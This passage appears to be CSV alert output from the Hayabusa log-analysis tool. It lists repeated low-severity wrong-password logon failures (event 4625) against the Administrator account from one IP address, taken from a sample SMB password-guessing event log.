Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mrNRIpCpmAV3npax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.401 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zpxgEvvoC0stFdTl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XvpDKRAPDS36sqNL | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.496 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4cqJKEIySxiQdCRD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.535 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pm1F7QEwBE054ui0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RvIjhyfdlXiX72Es | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.622 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dJilW4KgIEeh5VNr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Ka0FYYdVOj90l0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.715 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B9ZjGE8T6RuGx8SZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.758 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nkti4BGVrpoAQRBL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fZy2YJPOg1YZ2bd0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rUE6E9H9i0l0P7Jp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Pkpt2nmRorQ3x0o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.937 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hCZNNzSyi4mLLaxZ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.986 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O9ZqF43sDjSirvMK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XOw9DjHISDX57XUe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rmxFpEQeGsgbXpDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MfIVCOOWQS7TNKQA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.172 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uweLaLhvznDee1IF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.221 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oNQcS2BonF12ikiX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.265 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D43Flf2keSL3aph6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.307 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zw7nJXNHZ2QNa3In | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UZp4567BIWAwxF9r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S9iVvPuykq62pV9z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.431 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eRVomETC34InuKPk | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VpHfjKgAxChSYz8R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tIbTy5IDRy90lbUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.565 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mM6Olq0zYkMlwmrb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mUehtGEh0EqRHiLP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhZ2KHmCTonGrXSS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.696 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NZea5qiet7vrT3iv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aNWY8kuJMSy8h0Zk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.781 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bt9DUQ0mwhkJlTt8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zXYtsM2MMuNSYtVr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WgzvsdMN2SU7Knlh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.971 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DxiBYXNCY32yNb6L | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cVfJmOxvsp75g3a0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uHp1hlHjD8w3WKt3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dEeJWAJgOeueYSM9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tOfPGoUXu932L80d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.181 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NbH4R6GK1PIVT3ij | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.220 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PgsJokRd07Nh1lO1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.273 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 11ylyxQyV5HCJ18g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.322 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Am2qI1ya4wYdqErV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5o2AmZsYUYmDpWZE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c0Hd8xWxOxFifJBG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.461 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlh64Gtfoig2uzOY | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.522 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LtK8Hj2kf3dfFSnW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.562 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VKUPqxtNqkVqXgTg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SKSxp87CBg8L8wSi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CpvxvR0ftQs1gdEF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U9RGDzNMt9fM6rLF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.730 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RvOO9NLhbbKJXQq9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mDB9bIx7LcoJ6IAU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.822 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pfJWsGqlQTmFUUPT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9PRIO3MASsjrdQGs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P9QCn4nZHB0ENeA1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.961 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4iUNHB1gE2d1dBfZ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tM3IdtrLdVXQjOjB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dbmn9Er9e1JZZybc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.102 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SY40ARcAoo9cWQIP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.139 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fc7m0blzidQfn1BU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 13SkGPbDDXou7qLA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.235 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2YIlJeZpJlvcKgqt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BRhH6atcwLcGmrB4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.324 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BGIInLsy4UCfl0oW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4qJ7nEN0u9DkVuVH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.413 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6qb85lEENmrj4ebF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.487 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q6RXAj26rnxMmxuL | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.533 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tas7cqRNGQw6FlVX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FQlF8GYIeWytFLsJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dj48ftx52s1HntRT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.710 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B46vTS9PxUgUblBp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.770 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eoIFbywJEC0QaceV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.817 
